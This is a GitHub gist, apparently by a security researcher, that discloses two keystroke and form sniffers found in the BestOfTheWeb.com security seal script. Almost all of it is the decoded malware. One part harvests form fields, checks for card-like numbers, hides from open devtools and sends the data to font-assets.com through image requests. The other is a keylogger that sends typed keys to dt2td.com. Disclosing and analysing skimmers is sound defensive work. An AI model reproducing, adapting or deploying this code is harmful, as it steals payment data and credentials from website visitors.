Skip to content

Instantly share code, notes, and snippets.

@gwillem
Last active March 2, 2022 17:32
Show Gist options
  • Save gwillem/4403a9caf6877d6276cf6fe834a0b48a to your computer and use it in GitHub Desktop.
Save gwillem/4403a9caf6877d6276cf6fe834a0b48a to your computer and use it in GitHub Desktop.
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
var sniffData = {};
sniffData['Gate'] = 'https://font-assets.com/img';
sniffData['Data'] = {};
sniffData['Sent'] = [];
sniffData.IsValid = ![];
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.id] = field.value;
return;
}
if (field.name !== undefined && field.name != '' && field.name !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.name] = field.value;
return;
}
};
sniffData.SaveAllFields = function() {
var inputfields = document.getElementsByTagName('input');
var selectfields = document.getElementsByTagName('select');
var textareas = document.getElementsByTagName('textarea');
for (var i = 0; i < inputfields.length; i++) sniffData.SaveParam(inputfields[i]);
for (var i = 0; i < selectfields.length; i++) sniffData.SaveParam(selectfields[i]);
for (var i = 0; i < textareas.length; i++) sniffData.SaveParam(textareas[i]);
};
sniffData['SendData'] = function() {
if (!window.devtools.isOpen && sniffData.IsValid) {
sniffData.Data.Domain = location.hostname;
var _0x43c1ef = encodeURIComponent(window.btoa(JSON.stringify(sniffData.Data)));
var _0x2c70f7 = _0x43c1ef.hashCode();
for (var _0x3cbd0c = 0x0; _0x3cbd0c < sniffData.Sent.length; _0x3cbd0c++)
if (sniffData.Sent[_0x3cbd0c] == _0x2c70f7) return;
sniffData.LoadImage(_0x43c1ef);
}
};
sniffData.TrySend = function() {
sniffData.SaveAllFields();
sniffData.SendData();
};
sniffData.LoadImage = function(_0x3e43b7) {
sniffData.Sent.push(_0x3e43b7.hashCode());
var _0x2d7e85 = document.createElement('IMG');
_0x2d7e85.src = sniffData.GetImageUrl(_0x3e43b7);
};
sniffData.GetImageUrl = function(_0x51c1cf) {
return sniffData.Gate + '?reff=' + _0x51c1cf;
};
document.onreadystatechange = function() {
if (document.readyState === 'complete') {
window.setInterval(sniffData.TrySend, 0x1f4);
}
}
// (c) Decoded by Sanguine Security
var keystrokes = '';
var sniffURL = 'https://dt2td.com/jsk/imgtrack.php?c=';
document.onkeypress = function (keypress) {
get = window.event ? event : keypress;
key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keystrokes += key;
};
window['setInterval'](function () {
if (keystrokes.length > 0) {
new Image()['src'] = sniffURL + keystrokes;
keystrokes = '';
}
})
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment